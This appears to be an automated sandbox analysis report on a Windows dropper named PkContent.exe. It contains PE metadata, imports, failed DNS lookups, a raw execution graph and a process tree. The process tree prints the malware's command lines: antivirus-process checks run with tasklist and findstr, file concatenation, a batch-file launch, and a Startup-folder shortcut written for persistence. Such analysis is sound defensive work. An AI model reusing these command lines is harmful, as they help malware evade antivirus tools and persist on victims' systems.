                                              .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xf40000x1e8980x1ea0034eb4b5442afecdb4d25529894ddb814False0.03270886479591837data0.3626277943818537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1130000xf320x100080b2788b8bb2dc8c3af02ada6000736dFalse0.045654296875data0.3620189715935393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xf42200x11028Device independent bitmap graphic, 128 x 256 x 32, image size 69632EnglishUnited States0.02018027328051441
                                              RT_ICON0x1052480x9928Device independent bitmap graphic, 96 x 192 x 32, image size 39168EnglishUnited States0.02583656396653744
                                              RT_ICON0x10eb700x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.05014239218877136
                                              RT_ICON0x1111d80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.07126593806921676
                                              RT_DIALOG0x1123000x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x1124000x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0x1125200x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x1125800x3edataEnglishUnited States0.8225806451612904
                                              RT_MANIFEST0x1125c00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                              DLLImport
                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 18, 2024 15:30:43.530864000 CET5856853192.168.2.51.1.1.1
                                              Dec 18, 2024 15:30:43.668308020 CET53585681.1.1.1192.168.2.5
                                              Dec 18, 2024 15:30:58.974833965 CET6540353192.168.2.51.1.1.1
                                              Dec 18, 2024 15:30:59.112845898 CET53654031.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 18, 2024 15:30:43.530864000 CET192.168.2.51.1.1.10x2ca2Standard query (0)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrzA (IP address)IN (0x0001)false
                                              Dec 18, 2024 15:30:58.974833965 CET192.168.2.51.1.1.10x59f1Standard query (0)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrzA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 18, 2024 15:30:43.668308020 CET1.1.1.1192.168.2.50x2ca2Name error (3)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrznonenoneA (IP address)IN (0x0001)false
                                              Dec 18, 2024 15:30:59.112845898 CET1.1.1.1192.168.2.50x59f1Name error (3)ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrznonenoneA (IP address)IN (0x0001)false

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:09:30:38
                                              Start date:18/12/2024
                                              Path:C:\Users\user\Desktop\PkContent.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PkContent.exe"
                                              Imagebase:0x400000
                                              File size:830'415 bytes
                                              MD5 hash:87C051A77EDC0CC77A4D791EF72367D1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:30:39
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:09:30:39
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:09:30:40
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                              Wow64 process (32bit):true
                                              Commandline:tasklist
                                              Imagebase:0xa30000
                                              File size:79'360 bytes
                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:09:30:40
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /I "wrsa opssvc"
                                              Imagebase:0x680000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                              Wow64 process (32bit):true
                                              Commandline:tasklist
                                              Imagebase:0xa30000
                                              File size:79'360 bytes
                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                              Imagebase:0x680000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c md 724598
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /V "WowLiberalCalOfficer" Weight
                                              Imagebase:0x680000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                              Wow64 process (32bit):true
                                              Commandline:Thermal.pif y
                                              Imagebase:0x770000
                                              File size:893'608 bytes
                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 8%, ReversingLabs
                                              Has exited:false

                                              Target ID:12
                                              Start time:09:30:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\choice.exe
                                              Wow64 process (32bit):true
                                              Commandline:choice /d y /t 5
                                              Imagebase:0x40000
                                              File size:28'160 bytes
                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:13
                                              Start time:09:30:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:14
                                              Start time:09:30:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:09:30:55
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
                                              Imagebase:0x7ff7a9ab0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:17
                                              Start time:09:30:55
                                              Start date:18/12/2024
                                              Path:C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
                                              Imagebase:0x8b0000
                                              File size:893'608 bytes
                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 8%, ReversingLabs
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:17.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:20.7%
                                                Total number of Nodes:1526
                                                Total number of Limit Nodes:33
                                                execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 